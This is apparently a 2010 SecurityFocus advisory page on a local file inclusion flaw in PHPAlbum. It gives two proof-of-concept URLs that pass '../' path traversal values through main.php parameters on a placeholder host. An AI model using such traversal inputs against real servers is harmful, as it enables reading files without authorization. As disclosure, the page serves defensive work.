info
discussion
exploit
solution
references
PHPAlbum Local File Include Vulnerability
No exploit is required.
The following proof-of-concept examples are available:
http://www.example.com/main.php?cmd=../
http://www.example.com/main.php?cmd=album&var1=../
Privacy Statement
Copyright 2010, SecurityFocus